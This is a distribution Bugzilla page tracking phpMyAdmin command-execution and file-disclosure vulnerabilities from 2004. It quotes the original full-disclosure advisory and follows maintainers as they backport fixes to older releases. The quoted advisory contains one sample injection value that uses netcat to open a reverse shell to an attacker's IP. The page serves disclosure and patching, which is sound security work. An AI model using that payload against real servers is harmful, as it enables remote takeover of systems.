Bugzilla – Bug 64212
VUL-0: CVE-2004-1148: phpMyAdmin remote command execution
Last modified: 2021-10-04 10:26:44 UTC
We received the following report via full-disclosure. The issue is public. Date: Mon, 13 Dec 2004 14:02:09 +0100 From: Nicolas Gregoire <ngregoire@exaprobe.com> To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org Cc: Subject: [Full-Disclosure] Multiple vulnerabilities in phpMyAdmin Exaprobe www.exaprobe.com Security Advisory Advisory Name: Multiple vulnerabilities in phpMyAdmin Release Date: 13 December 2004 Application: phpMyAdmin prior to 2.6.1-rc1 Platform: Any webserver running PHP Severity: Remote code execution Author: Nicolas Gregoire <ngregoire@exaprobe.com> Vendor Status: Updated code is available CVE Candidates: CAN-2004-1147 and CAN-2004-1148 Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html Overview : ========== phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges, export data into various formats and is available in 47 languages. Technical details : =================== Command execution : - bug introduced in 2.6.0-pl2 - attacker does *not* need access to the phpMyAdmin interface - PHP safe mode must be off - external transformations must be activated - sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A File disclosure : - attacker need access to the phpMyAdmin interface - PHP safe mode must be off - $cfg['UploadDir'] must be defined - exploitation is done via 'sql_localfile' Vendor Response : ================= After notification by Exaprobe, maintainers of the phpMyAdmin project have released version 2.6.1-rc1 which fixes these two vulnerabilities. Recommendation : ================ Upgrade to 2.6.1-rc1 or newer. Desactivate uploads and transformations if possible. CVE Information : ================= The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CAN-2004-1147 Command execution in phpMyAdmin CAN-2004-1148 File disclosure in phpMyAdmin
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-4 Should I backport patches or wait for 2.6.1 and update? (I guess update to release candidate is not an option)
* This comment was added by mail. Please backport if the effort is sustainable. At least the command execution sounds rather nasty as it seems to happen before authentication. I can't judge whether the constraints that are needed to be able to exploit it are fulfilled in practice though.
It does not happen before authentication. Attacker needs access to MySQL database.
Okay, I'll port patches.
Anyway, we didn't yet fix: http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-3 porting that patch will be more complicated as it touches quite many places...
I've ported patches to version we have in 9.0-9.2, for olders code seems to be much changed.
It seems or it in fact is? :-)
The code is completely different there, so that version might be not vulnerable or that issue is just better hidden :-)
Ok. Can you please submit the packages you can fix then (so we have the diff). Someone of the security-team should have a look at the old verions then.
Okay, I'll check, whether they work correctly and submit it.
Submitted fixed packages for 9.0-9.2.
"- bug introduced in 2.6.0-pl2" ... 8.2 has 2.4, so I suspect 8.2 and 8.1 are not affected?
It was not itroduced in 2.6.0-pl2, but was in all versions that have transformations (AFAIK 2.5 and newer). However other issues might be also in older versions.
any update here?
the uploaddir thing is present in 8.2 but not 8.1, easy. bits of the XSS patch can be found in 8.2 and 8.1. The big hunk isn't present. I'd suggest to fix the obvious places taking the risk to miss some places where quoting should have taken place.
Fixed packages for 8.1 and 8.2 submitted.
Created patchinfo file as /work/src/done/PATCHINFO/phpMyAdmin.rKl9hy
approved fixed packages
CVE-2004-1148: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)